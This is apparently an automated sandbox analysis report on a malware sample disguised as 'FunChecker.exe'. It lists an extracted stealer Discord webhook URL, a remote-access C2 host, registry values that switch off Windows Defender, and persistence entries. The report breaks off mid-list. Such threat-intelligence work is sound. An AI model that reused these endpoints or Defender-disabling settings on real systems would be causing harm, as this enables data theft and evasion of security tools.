Analysis
-
max time kernel
82s -
max time network
89s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
20-07-2024 15:16
Behavioral task
behavioral1
Sample
FunChecker.zip
Resource
win10-20240404-en
General
-
Target
FunChecker.exe
-
Size
13.6MB
-
MD5
8b2fa6497ba4fc285a5545bda2e8cde6
-
SHA1
31cec6fb97888c34c80af8ca73aa67456f68e4e3
-
SHA256
5197fcb7b98a65eabf8151d847bb394eccd65a184f06a82f674a9b95e62e701c
-
SHA512
fbf93ca3aecabdbb4a8c978037ca15f14b990fdd32c892e0fdd8bbb491bde8005fbf8326dbd89adf71e9c7cca7f1592dc7ef5694cc45181a50332ed6a594ee40
-
SSDEEP
393216:jrmibLqxo6IKWmKF8tmZ4O/Qtu1dmoz2jqK8VPYAjV2:jr7b+xHI76tmZ4O4E1d99QAjQ
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1263969302936031242/olHrwbuoNh8UxVs0Eh00oYjpj3hs8m4JFfGFTZq-qdru9A_R06a4zPTH8NVHDmX7Crj_
Extracted
xworm
3.0
plus-loves.gl.at.ply.gg:59327
-
Install_directory
%AppData%
-
install_file
USB.exe
Signatures
-
Detect Umbral payload 3 IoCs
resource yara_rule behavioral2/memory/2660-41-0x0000000000C80000-0x000000000126A000-memory.dmp family_umbral behavioral2/memory/2660-39-0x0000000000C80000-0x000000000126A000-memory.dmp family_umbral behavioral2/memory/2660-2306-0x0000000000C80000-0x000000000126A000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x000b00000001ac13-2321.dat family_xworm behavioral2/memory/4424-2323-0x0000000000CC0000-0x0000000000CF4000-memory.dmp family_xworm -
Modifies WinLogon for persistence 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Windows\\Offline Web Pages\\WmiPrvSE.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\HypercomponentCommon\\InstallAgent.exe\", \"C:\\Recovery\\WindowsRE\\lsass.exe\", \"C:\\HypercomponentCommon\\hyperSurrogateagentCrt.exe\"" hyperSurrogateagentCrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" hyperSurrogateagentCrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Windows\\Offline Web Pages\\WmiPrvSE.exe\"" hyperSurrogateagentCrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Windows\\Offline Web Pages\\WmiPrvSE.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\"" hyperSurrogateagentCrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Windows\\Offline Web Pages\\WmiPrvSE.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\HypercomponentCommon\\InstallAgent.exe\"" hyperSurrogateagentCrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Windows\\Offline Web Pages\\WmiPrvSE.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\HypercomponentCommon\\InstallAgent.exe\", \"C:\\Recovery\\WindowsRE\\lsass.exe\"" hyperSurrogateagentCrt.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1040 1108 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3804 1108 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2904 1108 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4628 1108 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2764 1108 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4204 1108 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 488 1108 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3356 1108 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4356 1108 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 312 1108 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1504 1108 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3848 1108 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 672 1108 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2348 1108 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1940 1108 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3708 1108 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3048 1108 schtasks.exe 100 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4444 1108 schtasks.exe 100 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ system32.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Microsoft OneDrive.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ XClient.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3564 powershell.exe 64 powershell.exe 832 powershell.exe 4140 powershell.exe 4088 powershell.exe 3048 powershell.exe 4852 powershell.exe 3712 powershell.exe 4396 powershell.exe 4444 powershell.exe 4392 powershell.exe 2572 powershell.exe 4980 powershell.exe 1120 powershell.exe 2328 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts system32.exe -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion system32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion system32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Microsoft OneDrive.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Microsoft OneDrive.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion XClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion XClient.exe -
Drops startup file 6 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft OneDrive.lnk Microsoft OneDrive.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HPN42SDD8UHTLWI.lnk HPN42SDD8UHTLWI.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HPN42SDD8UHTLWI.lnk HPN42SDD8UHTLWI.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FunCheker.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FunCheker.lnk XClient.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft OneDrive.lnk Microsoft OneDrive.exe -
Executes dropped EXE 7 IoCs
pid Process 2660 system32.exe 2992 Microsoft OneDrive.exe 4016 XClient.exe 4424 HPN42SDD8UHTLWI.exe 4912 33WHFCVS57NXGIT.exe 664 hyperSurrogateagentCrt.exe 2044 dwm.exe -
Identifies Wine through registry keys 2 TTPs 3 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Wine Microsoft OneDrive.exe Key opened \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Wine XClient.exe Key opened \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Wine system32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/memory/4228-1-0x00000000004B0000-0x000000000190C000-memory.dmp vmprotect -
Adds Run key to start application 2 TTPs 15 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft OneDrive = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft OneDrive.exe" Microsoft OneDrive.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" hyperSurrogateagentCrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\WindowsRE\\dwm.exe\"" hyperSurrogateagentCrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\hyperSurrogateagentCrt = "\"C:\\HypercomponentCommon\\hyperSurrogateagentCrt.exe\"" hyperSurrogateagentCrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" hyperSurrogateagentCrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\InstallAgent = "\"C:\\HypercomponentCommon\\InstallAgent.exe\"" hyperSurrogateagentCrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\WindowsRE\\lsass.exe\"" hyperSurrogateagentCrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\Offline Web Pages\\WmiPrvSE.exe\"" hyperSurrogateagentCrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\WindowsRE\\dwm.exe\"" hyperSurrogateagentCrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\InstallAgent = "\"C:\\HypercomponentCommon\\InstallAgent.exe\"" hyperSurrogateagentCrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\WindowsRE\\lsass.exe\"" hyperSurrogateagentCrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hyperSurrogateagentCrt = "\"C:\\HypercomponentCommon\\hyperSurrogateagentCrt.exe\"" hyperSurrogateagentCrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\FunCheker = "C:\\Users\\Admin\\AppData\\Roaming\\FunCheker.exe" XClient.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\HPN42SDD8UHTLWI = "C:\\Users\\Admin\\AppData\\Roaming\\HPN42SDD8UHTLWI.exe" HPN42SDD8UHTLWI.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\Offline Web Pages\\WmiPrvSE.exe\"" hyperSurrogateagentCrt.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Microsoft OneDrive.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA system32.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA XClient.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 11 discord.com 12 discord.com 24 raw.githubusercontent.com 25 raw.githubusercontent.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com 9 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 system32.exe File opened for modification \??\PhysicalDrive0 Microsoft OneDrive.exe File opened for modification \??\PhysicalDrive0 XClient.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created \??\c:\Windows\System32\CSC9F2BFC5A824449828879E6BA61F831F8.TMP csc.exe File created \??\c:\Windows\System32\p6rbzy.exe csc.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 2660 system32.exe 2992 Microsoft OneDrive.exe 4016 XClient.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\rescache\_merged\4183903823\2290032291.pri taskmgr.exe File created C:\Windows\rescache\_merged\1601268389\715946058.pri taskmgr.exe File created C:\Windows\Offline Web Pages\WmiPrvSE.exe hyperSurrogateagentCrt.exe File created C:\Windows\Offline Web Pages\24dbde2999530e hyperSurrogateagentCrt.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4972 wmic.exe -
Modifies registry class 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings 33WHFCVS57NXGIT.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings hyperSurrogateagentCrt.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1940 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 21 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4204 schtasks.exe 3848 schtasks.exe 1940 schtasks.exe 2904 schtasks.exe 2764 schtasks.exe 1040 schtasks.exe 488 schtasks.exe 312 schtasks.exe 2348 schtasks.exe 3048 schtasks.exe 664 schtasks.exe 2000 schtasks.exe 1504 schtasks.exe 672 schtasks.exe 3708 schtasks.exe 4444 schtasks.exe 3684 schtasks.exe 4628 schtasks.exe 4356 schtasks.exe 3804 schtasks.exe 3356 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2660 system32.exe 2660 system32.exe 2992 Microsoft OneDrive.exe 2992 Microsoft OneDrive.exe 4016 XClient.exe 4016 XClient.exe 3048 powershell.exe 3048 powershell.exe 3048 powershell.exe 4444 powershell.exe 4444 powershell.exe 3564 powershell.exe 3564 powershell.exe 4444 powershell.exe 3564 powershell.exe 3564 powershell.exe 4444 powershell.exe 1676 powershell.exe 1676 powershell.exe 1676 powershell.exe 1676 powershell.exe 1120 powershell.exe 1120 powershell.exe 64 powershell.exe 64 powershell.exe 1120 powershell.exe 64 powershell.exe 1120 powershell.exe 64 powershell.exe 4404 powershell.exe 4852 powershell.exe 4852 powershell.exe 4404 powershell.exe 4404 powershell.exe 3712 powershell.exe 3712 powershell.exe 4852 powershell.exe 4404 powershell.exe 3712 powershell.exe 4852 powershell.exe 3712 powershell.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4356 powershell.exe 4356 powershell.exe 832 powershell.exe 832 powershell.exe 4356 powershell.exe 4964 taskmgr.exe 832 powershell.exe 4356 powershell.exe 4392 powershell.exe 4392 powershell.exe 832 powershell.exe 4392 powershell.exe 4964 taskmgr.exe 4392 powershell.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4016 XClient.exe 2992 Microsoft OneDrive.exe 4116 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2660 system32.exe Token: SeDebugPrivilege 2992 Microsoft OneDrive.exe Token: SeDebugPrivilege 4016 XClient.exe Token: SeDebugPrivilege 3048 powershell.exe Token: SeDebugPrivilege 4444 powershell.exe Token: SeDebugPrivilege 3564 powershell.exe Token: SeDebugPrivilege 1676 powershell.exe Token: SeDebugPrivilege 1120 powershell.exe Token: SeDebugPrivilege 64 powershell.exe Token: SeDebugPrivilege 4404 powershell.exe Token: SeDebugPrivilege 4852 powershell.exe Token: SeDebugPrivilege 3712 powershell.exe Token: SeDebugPrivilege 4964 taskmgr.exe Token: SeSystemProfilePrivilege 4964 taskmgr.exe Token: SeCreateGlobalPrivilege 4964 taskmgr.exe Token: SeDebugPrivilege 4356 powershell.exe Token: SeDebugPrivilege 832 powershell.exe Token: SeDebugPrivilege 4392 powershell.exe Token: SeIncreaseQuotaPrivilege 4332 wmic.exe Token: SeSecurityPrivilege 4332 wmic.exe Token: SeTakeOwnershipPrivilege 4332 wmic.exe Token: SeLoadDriverPrivilege 4332 wmic.exe Token: SeSystemProfilePrivilege 4332 wmic.exe Token: SeSystemtimePrivilege 4332 wmic.exe Token: SeProfSingleProcessPrivilege 4332 wmic.exe Token: SeIncBasePriorityPrivilege 4332 wmic.exe Token: SeCreatePagefilePrivilege 4332 wmic.exe Token: SeBackupPrivilege 4332 wmic.exe Token: SeRestorePrivilege 4332 wmic.exe Token: SeShutdownPrivilege 4332 wmic.exe Token: SeDebugPrivilege 4332 wmic.exe Token: SeSystemEnvironmentPrivilege 4332 wmic.exe Token: SeRemoteShutdownPrivilege 4332 wmic.exe Token: SeUndockPrivilege 4332 wmic.exe Token: SeManageVolumePrivilege 4332 wmic.exe Token: 33 4332 wmic.exe Token: 34 4332 wmic.exe Token: 35 4332 wmic.exe Token: 36 4332 wmic.exe Token: SeIncreaseQuotaPrivilege 4332 wmic.exe Token: SeSecurityPrivilege 4332 wmic.exe Token: SeTakeOwnershipPrivilege 4332 wmic.exe Token: SeLoadDriverPrivilege 4332 wmic.exe Token: SeSystemProfilePrivilege 4332 wmic.exe Token: SeSystemtimePrivilege 4332 wmic.exe Token: SeProfSingleProcessPrivilege 4332 wmic.exe Token: SeIncBasePriorityPrivilege 4332 wmic.exe Token: SeCreatePagefilePrivilege 4332 wmic.exe Token: SeBackupPrivilege 4332 wmic.exe Token: SeRestorePrivilege 4332 wmic.exe Token: SeShutdownPrivilege 4332 wmic.exe Token: SeDebugPrivilege 4332 wmic.exe Token: SeSystemEnvironmentPrivilege 4332 wmic.exe Token: SeRemoteShutdownPrivilege 4332 wmic.exe Token: SeUndockPrivilege 4332 wmic.exe Token: SeManageVolumePrivilege 4332 wmic.exe Token: 33 4332 wmic.exe Token: 34 4332 wmic.exe Token: 35 4332 wmic.exe Token: 36 4332 wmic.exe Token: SeIncreaseQuotaPrivilege 4528 wmic.exe Token: SeSecurityPrivilege 4528 wmic.exe Token: SeTakeOwnershipPrivilege 4528 wmic.exe Token: SeLoadDriverPrivilege 4528 wmic.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe 4964 taskmgr.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4016 XClient.exe 2992 Microsoft OneDrive.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4228 wrote to memory of 3684 4228 FunChecker.exe 73 PID 4228 wrote to memory of 3684 4228 FunChecker.exe 73 PID 4228 wrote to memory of 2348 4228 FunChecker.exe 75 PID 4228 wrote to memory of 2348 4228 FunChecker.exe 75 PID 4228 wrote to memory of 2332 4228 FunChecker.exe 77 PID 4228 wrote to memory of 2332 4228 FunChecker.exe 77 PID 4228 wrote to memory of 428 4228 FunChecker.exe 78 PID 4228 wrote to memory of 428 4228 FunChecker.exe 78 PID 4228 wrote to memory of 2660 4228 FunChecker.exe 81 PID 4228 wrote to memory of 2660 4228 FunChecker.exe 81 PID 4228 wrote to memory of 2660 4228 FunChecker.exe 81 PID 4228 wrote to memory of 2992 4228 FunChecker.exe 82 PID 4228 wrote to memory of 2992 4228 FunChecker.exe 82 PID 4228 wrote to memory of 2992 4228 FunChecker.exe 82 PID 4228 wrote to memory of 4016 4228 FunChecker.exe 83 PID 4228 wrote to memory of 4016 4228 FunChecker.exe 83 PID 4228 wrote to memory of 4016 4228 FunChecker.exe 83 PID 428 wrote to memory of 2968 428 cmd.exe 84 PID 428 wrote to memory of 2968 428 cmd.exe 84 PID 3684 wrote to memory of 1676 3684 cmd.exe 122 PID 3684 wrote to memory of 1676 3684 cmd.exe 122 PID 3684 wrote to memory of 600 3684 cmd.exe 86 PID 3684 wrote to memory of 600 3684 cmd.exe 86 PID 3684 wrote to memory of 2172 3684 cmd.exe 87 PID 3684 wrote to memory of 2172 3684 cmd.exe 87 PID 2660 wrote to memory of 3048 2660 system32.exe 88 PID 2660 wrote to memory of 3048 2660 system32.exe 88 PID 2660 wrote to memory of 3048 2660 system32.exe 88 PID 3684 wrote to memory of 3348 3684 cmd.exe 90 PID 3684 wrote to memory of 3348 3684 cmd.exe 90 PID 3684 wrote to memory of 4868 3684 cmd.exe 91 PID 3684 wrote to memory of 4868 3684 cmd.exe 91 PID 3684 wrote to memory of 424 3684 cmd.exe 92 PID 3684 wrote to memory of 424 3684 cmd.exe 92 PID 3684 wrote to memory of 2972 3684 cmd.exe 93 PID 3684 wrote to memory of 2972 3684 cmd.exe 93 PID 3684 wrote to memory of 508 3684 cmd.exe 94 PID 3684 wrote to memory of 508 3684 cmd.exe 94 PID 3684 wrote to memory of 2216 3684 cmd.exe 95 PID 3684 wrote to memory of 2216 3684 cmd.exe 95 PID 3684 wrote to memory of 1912 3684 cmd.exe 96 PID 3684 wrote to memory of 1912 3684 cmd.exe 96 PID 3684 wrote to memory of 1936 3684 cmd.exe 97 PID 3684 wrote to memory of 1936 3684 cmd.exe 97 PID 3684 wrote to memory of 4404 3684 cmd.exe 128 PID 3684 wrote to memory of 4404 3684 cmd.exe 128 PID 3684 wrote to memory of 524 3684 cmd.exe 99 PID 3684 wrote to memory of 524 3684 cmd.exe 99 PID 3684 wrote to memory of 2760 3684 